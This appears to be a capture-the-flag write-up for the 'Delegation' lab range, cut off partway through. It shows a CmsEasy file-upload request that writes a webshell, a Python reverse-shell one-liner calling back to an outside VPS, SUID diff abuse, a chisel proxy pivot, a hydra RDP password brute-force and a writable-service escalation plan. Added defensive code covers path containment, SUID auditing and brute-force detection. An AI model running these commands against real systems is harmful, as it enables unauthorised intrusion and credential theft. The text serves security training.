Delegation
Tags
- Brute Force - RDP password brute-forcing
- Privilege Elevation - Linux SUID privileged files
- Privilege Elevation - Windows service configuration flaw privilege escalation
- Kerberos - Kerberos TGT ticket abuse
- Domain penetration - DCSync & RPC forced authentication
Target overview
Delegation is a medium-difficulty range environment. Completing the challenge helps players understand the proxy forwarding, internal network scanning, information gathering, privilege escalation and lateral movement techniques used in intranet penetration, strengthens their understanding of the core authentication mechanisms of a domain environment, and covers some interesting technical points of domain penetration. The range has 4 flags, distributed across different hosts.
39.99.241.120
Entry point: reconnaissance
Scan the entry-point host with fscan:
start infoscan
39.99.241.120:80 open
39.99.241.120:21 open
39.99.241.120:22 open
39.99.241.120:3306 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.241.120 code:200 len:68108 title: 中文网页标题
Entry point: building a webshell via CmsEasy arbitrary file upload
Directory scanning reveals an /admin/ back-end login page; manual attempts confirm the weak credentials admin:123456.
Based on the "Powered by CmsEasy" footer, a search for known vulnerabilities, combined with the fact that the back-end is accessible, identifies the vulnerability to exploit as the authenticated arbitrary file upload.
Reference: CmsEasy_7.7.5_20211012 arbitrary file write and arbitrary file read vulnerabilities | jdr
POST /index.php?case=template&act=save&admin_dir=admin&site=default HTTP/1.1
Host: 39.99.237.127
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=i6o38uig1s56o0j0u8diitem0h; login_username=admin; login_password=a14cdfc627cef32c707a7988e70c1313
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
sid=#data_d_.._d_.._d_.._d_1.php&slen=693&scontent=<?php phpinfo();?>
Visiting http://39.99.237.127/1.php shows the phpinfo page, confirming that a webshell can be written this way.
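The request above works because the sid parameter is turned into a filesystem path without any containment check. As an added defensive example (not CmsEasy's own code), the following shows how a template-save handler should resolve that parameter; the "_d_" to "/" mapping and the template root path are assumptions inferred from the request, not taken from the CmsEasy source.

```python
from pathlib import Path
from typing import Optional

# Added defensive example, not CmsEasy's own code. Assumption inferred from the
# request above: the template-save handler turns "_d_" in the sid parameter
# into a path separator, so "#data_d_.._d_.._d_.._d_1.php" climbs out of the
# template directory and drops 1.php into the web root.
TEMPLATE_ROOT = Path("/var/www/html/template/default").resolve()  # hypothetical
ALLOWED_SUFFIXES = {".html", ".htm", ".tpl"}  # template types only, never .php


def decode_sid(sid: str) -> str:
    """Mirror the assumed encoding: drop a leading '#', map '_d_' to '/'."""
    return sid.lstrip("#").replace("_d_", "/")


def resolve_template_path(sid: str, root: Path = TEMPLATE_ROOT) -> Optional[Path]:
    """Return the on-disk path for a template name, or None if it must be refused.

    Two independent checks: the resolved path has to stay inside `root`
    (defeats '..' segments and absolute paths), and the suffix has to be a
    template type (defeats writing executable code even inside the root).
    """
    relative = decode_sid(sid)
    # Reject NUL bytes and absolute paths before touching the filesystem.
    if "\x00" in relative or relative.startswith("/"):
        return None
    candidate = (root / relative).resolve()
    try:
        candidate.relative_to(root)  # ValueError when the path escaped root
    except ValueError:
        return None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES:
        return None
    return candidate
```

With this in place the payload from the request is refused twice over: it leaves the template root and it ends in .php.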
Entry point: reverse shell + persistence
Using the webshell, reverse a shell back to the VPS:
root@jmt-projekt:~# nc -lvnp 9999
Listening on 0.0.0.0 9999
Connection received on 39.99.237.127 43980
whoami
www-data
python3 --version
Python 3.8.10
Since Python is available on the host, use a Python reverse shell to obtain a fully functional shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("139.*.*.*",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
root@jmt-projekt:~# pwncat-cs -lp 8888
[08:25:49] Welcome to pwncat 🐈! __main__.py:164
[08:26:19] received connection from 39.99.237.127:39390 bind.py:84
[08:26:21] 0.0.0.0:8888: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[08:26:22] 39.99.237.127:39390: registered new host w/ db manager.py:957
(local) pwncat$ back
(remote) www-data@localhost:/var/www/html$ whoami
www-data
Entry point: SUID privilege escalation
Scan for SUID files:
(remote) www-data@localhost:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/diff is found to be SUID, which allows arbitrary file read. The flag file is also located:
(remote) www-data@localhost:/$ ls -lh /home/flag/
total 4.0K
-r-------- 1 root root 798 Jul 24 08:14 flag01.txt
flag01.txt can therefore be read directly with /usr/bin/diff --line-format=%L /dev/null /home/flag/flag01.txt
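From the defender's side, the SUID list above is only a problem because nobody compared it with what the host should have. As an added example that is not part of the original writeup, the following audit parses find output of the same shape, can also scan a live host, and reports setuid files that are missing from a baseline; the baseline here is a constructed Ubuntu-like example, not an authoritative distro list.

```python
import os
import stat
from typing import Iterable, Set

# Added defensive example, not part of the original writeup: compare a host's
# SUID inventory against an expected baseline and flag the extras for review.
# The baseline is a constructed example for an Ubuntu-like host, not an
# authoritative distro list; maintain your own from a clean build.
BASELINE_SUID = {
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/fusermount", "/usr/bin/gpasswd",
    "/usr/bin/mount", "/usr/bin/newgrp", "/usr/bin/passwd", "/usr/bin/su",
    "/usr/bin/sudo", "/usr/bin/umount", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/eject/dmcrypt-get-device",
}

# Constructed input: the find output shown above, as the host reported it.
SAMPLE_FIND_OUTPUT = "\n".join([
    "/usr/bin/stapbpf", "/usr/bin/gpasswd", "/usr/bin/chfn", "/usr/bin/su",
    "/usr/bin/chsh", "/usr/bin/staprun", "/usr/bin/at", "/usr/bin/diff",
    "/usr/bin/fusermount", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/newgrp",
    "/usr/bin/umount", "/usr/bin/passwd", "/usr/lib/openssh/ssh-keysign",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/usr/lib/eject/dmcrypt-get-device",
])


def parse_find_output(text: str) -> Set[str]:
    """Paths from `find / -perm -u=s -type f`; blank and non-path lines ignored."""
    return {line.strip() for line in text.splitlines() if line.strip().startswith("/")}


def live_scan(dirs: Iterable[str] = ("/usr/bin", "/usr/lib")) -> Set[str]:
    """Walk directories on the current host and collect setuid regular files."""
    found = set()
    for top in dirs:
        for dirpath, _dirnames, filenames in os.walk(top):
            for name in filenames:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)  # lstat: do not follow symlinks
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.add(path)
    return found


def unexpected_suid(found: Iterable[str], baseline: Set[str] = BASELINE_SUID) -> Set[str]:
    """Setuid files not in the baseline; each one needs a justification or removal."""
    return set(found) - baseline
```

Run against the sample above it singles out stapbpf, staprun, at and diff, exactly the binaries a build review should have questioned; on a real host, feed live_scan() into unexpected_suid() instead.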
flag - 01
[ASCII-art banner: DELEGATION]
flag01: flag{54bbe683-5e1d-4e18-96c3-724db360b28b}
Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...
Entry point: setting up a pivot
Using pwncat-cs's file upload capability, upload chisel_1.9.1_linux_amd64 and then set up a proxy tunnel:
root@jmt-projekt:~# ./chisel_1.9.1_linux_amd64 server -p 1337 --reverse
2024/07/24 08:45:56 server: Reverse tunnelling enabled
2024/07/24 08:45:56 server: Fingerprint 2YUi1QXviZmFSEGJIEb3uN4KxK+uVWmTtTH0LIaylDo=
2024/07/24 08:45:56 server: Listening on http://0.0.0.0:1337
(remote) www-data@localhost:/tmp$ ./chisel_1.9.1_linux_amd64 client 139.*.*.*:1337 R:0.0.0.0:10001:socks &
[1] 3352
2024/07/24 08:46:44 client: Connecting to ws://139.*.*.*:1337
2024/07/24 08:46:44 client: Connected (Latency 43.547056ms)
The connection is established successfully:
2024/07/24 08:46:44 server: session#1: tun: proxy#R:10001=>socks: Listening
Entry point: internal network information gathering
Upload fscan and scan the internal network:
(remote) www-data@localhost:/tmp$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.4.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe1b:be8a prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:1b:be:8a txqueuelen 1000 (Ethernet)
RX packets 89638 bytes 124109416 (124.1 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 21827 bytes 7117035 (7.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 678 bytes 59169 (59.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 678 bytes 59169 (59.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(remote) www-data@localhost:/tmp$ ./fscan_amd64.1 -h 172.22.4.36/24
......
start ping
(icmp) Target 172.22.4.7 is alive
(icmp) Target 172.22.4.19 is alive
(icmp) Target 172.22.4.36 is alive
(icmp) Target 172.22.4.45 is alive
[*] Icmp alive hosts len is: 4
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.7:139 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.19:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.36:22 open
172.22.4.36:21 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo:
[*]172.22.4.19
[->]FILESERVER
[->]172.22.4.19
[*] NetInfo:
[*]172.22.4.7
[->]DC01
[->]172.22.4.7
[*] NetBios: 172.22.4.7 [+]DC DC01.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios: 172.22.4.45 XIAORANG\WIN19
[*] NetInfo:
[*]172.22.4.45
[->]WIN19
[->]172.22.4.45
[*] 172.22.4.7 (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.4.19 FILESERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] WebTitle: http://172.22.4.36 code:200 len:68100 title: 中文网页标题
[*] WebTitle: http://172.22.4.45 code:200 len:703 title:IIS Windows Server
172.22.4.45 XIAORANG\WIN19: RDP password brute-force
From the information provided in flag - 02:
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...
the user is WIN19\Adrian and the password dictionary is rockyou.txt. Attempt an RDP brute-force:
┌──(randark ㉿ kali)-[~]
└─$ proxychains4 -q hydra -l "Adrian" -P /usr/share/wordlists/rockyou.txt rdp://172.22.4.45 -vV
[ATTEMPT] target 172.22.4.45 - login "Adrian" - pass "babygirl1" - 219 of 14344399 [child 3] (0/0)
[ERROR] freerdp: The password has expired and must be changed. (0x0002000e)
[RE-ATTEMPT] target 172.22.4.45 - login "Adrian" - pass "babygirl1" - 223 of 14344399 [child 3] (0/0)
[ERROR] freerdp: The password has expired and must be changed. (0x0002000e)
This yields an expired-password credential, Adrian:babygirl1. Try to connect with rdesktop:
┌──(randark ㉿ kali)-[~]
└─$ proxychains4 rdesktop 172.22.4.45
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 139.*.*.*:10001 ... 172.22.4.45:3389 ... OK
ATTENTION! The server uses and invalid security certificate which can not be trusted for
the following identified reasons(s);
1. Certificate issuer is not trusted by this system.
Issuer: CN=WIN19.xiaorang.lab
Review the following certificate info before you trust it to be added as an exception.
If you do not trust the certificate the connection atempt will be aborted:
Subject: CN=WIN19.xiaorang.lab
Issuer: CN=WIN19.xiaorang.lab
Valid From: Tue Jul 23 08:14:45 2024
To: Wed Jan 22 08:14:45 2025
Certificate fingerprints:
sha1: a06ec2425bc2cc6bcda14219c29eeea9535a4e60
sha256: b7edffe2d201fb98909e8463b077275ee0bfaaa3809851565cd3e25b421b2590
Do you trust this certificate (yes/no)? yes
Failed to initialize NLA, do you have correct Kerberos TGT initialized ?
[proxychains] Strict chain ... 139.*.*.*:10001 ... 172.22.4.45:3389 ... OK
Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate.
Connection established using SSL.
After changing the password to Adrian:admin123, the login succeeds.
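The hydra run above leaves a loud trail on WIN19: every attempt is a Security event 4625 from the same source, and the "password has expired" error is a sub-status that only appears once the right password has been supplied. As an added detection example, not part of the original writeup, the following flags that burst and notes when the expired-password sub-status shows that the guess succeeded; the events are constructed samples, not real logs.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Added detection example, not part of the original writeup. It models the
# Security log on WIN19 during the hydra run above: each failed RDP logon is
# event 4625 (logon type 3 when NLA fails at CredSSP, 10 for a classic RDP
# logon). The sub-status values are Microsoft's documented 4625 codes.
WRONG_PASSWORD = "0xC000006A"
PASSWORD_EXPIRED = "0xC0000071"  # the password was right; only the expiry failed

_t0 = datetime(2024, 7, 24, 9, 2, 0)
# Constructed sample events (not real logs): 12 rapid failures for Adrian from
# the pivot host, the last one an expired-password failure, plus one unrelated
# failure that must not alert.
SAMPLE_EVENTS: List[Dict] = [
    {"time": _t0 + timedelta(seconds=2 * i), "event_id": 4625, "account": "Adrian",
     "src_ip": "172.22.4.36", "logon_type": 3, "substatus": WRONG_PASSWORD}
    for i in range(11)
] + [
    {"time": _t0 + timedelta(seconds=22), "event_id": 4625, "account": "Adrian",
     "src_ip": "172.22.4.36", "logon_type": 3, "substatus": PASSWORD_EXPIRED},
    {"time": _t0 + timedelta(minutes=5), "event_id": 4625, "account": "svc_backup",
     "src_ip": "172.22.4.19", "logon_type": 3, "substatus": WRONG_PASSWORD},
]


def detect_rdp_spray(events: List[Dict], window: timedelta = timedelta(minutes=1),
                     threshold: int = 10) -> List[Dict]:
    """One alert per (source IP, account) with `threshold` failures inside `window`.

    The alert also records whether an expired-password failure occurred: that
    sub-status means the guessed password was correct, so the account needs a
    forced reset even though no logon ever succeeded.
    """
    by_key = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625 and ev["logon_type"] in (3, 10):
            by_key[(ev["src_ip"], ev["account"])].append(ev)
    alerts = []
    for (src, acct), evs in by_key.items():
        times = sorted(e["time"] for e in evs)
        # Sliding window over sorted timestamps: `threshold` consecutive failures
        # that fit inside `window` constitute a burst.
        burst = any(times[i + threshold - 1] - times[i] <= window
                    for i in range(len(times) - threshold + 1))
        if burst:
            alerts.append({"src_ip": src, "account": acct, "attempts": len(evs),
                           "password_guessed": any(e["substatus"] == PASSWORD_EXPIRED
                                                   for e in evs)})
    return alerts
```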
172.22.4.45 XIAORANG\WIN19: Windows service privilege escalation
On the desktop, under C:\Users\Adrian\Desktop\PrivescCheck, there is a file PrivescCheck_WIN19.html, a PrivescCheck privilege-escalation audit report.
It contains one High-severity finding:
Name : gupdate
ImagePath : "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc
User : LocalSystem
ModifiablePath : HKLM\SYSTEM\CurrentControlSet\Services\gupdate
IdentityReference : BUILTIN\Users
Permissions : WriteDAC, Notify, ReadControl, CreateLink, EnumerateSubKeys, WriteOwner, Delete, CreateSubKey, SetValue, QueryValue
Status : Stopped
UserCanStart : True
UserCanStop : True
This can be used to run an msf-generated payload.
The internal hosts have no outbound connectivity, so an internal -> external port forward must be set up in advance.
Because the binary launched by the service is stopped automatically after a while, migrate to another process promptly once the C2 connection is established.
Setting up the internal -> external port forward
(remote) www-data@localhost:/tmp$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.22.4.36 netmask 255.255.0.0 broadcast 172.22.255.255
inet6 fe80::216:3eff:fe1b:be8a prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:1b:be:8a txqueuelen 1000 (Ethernet)
RX packets 166956 bytes 177580251 (177.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 79621 bytes 28563311 (28.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 15264 bytes 6538426 (6.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 15264 bytes 6538426 (6.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
(remote) www-data@localhost:/tmp$ ./chisel_1.9.1_linux_amd64 client 139.*.*.*:1337 7777:7777 &
[2] 3495
2024/07/24 09:23:48 client: Connecting to ws://139.*.*.*:1337
2024/07/24 09:23:48 client: tun: proxy#7777=>7777: Listening
2024/07/24 09:23:48 client: Connected (Latency 44.160355ms)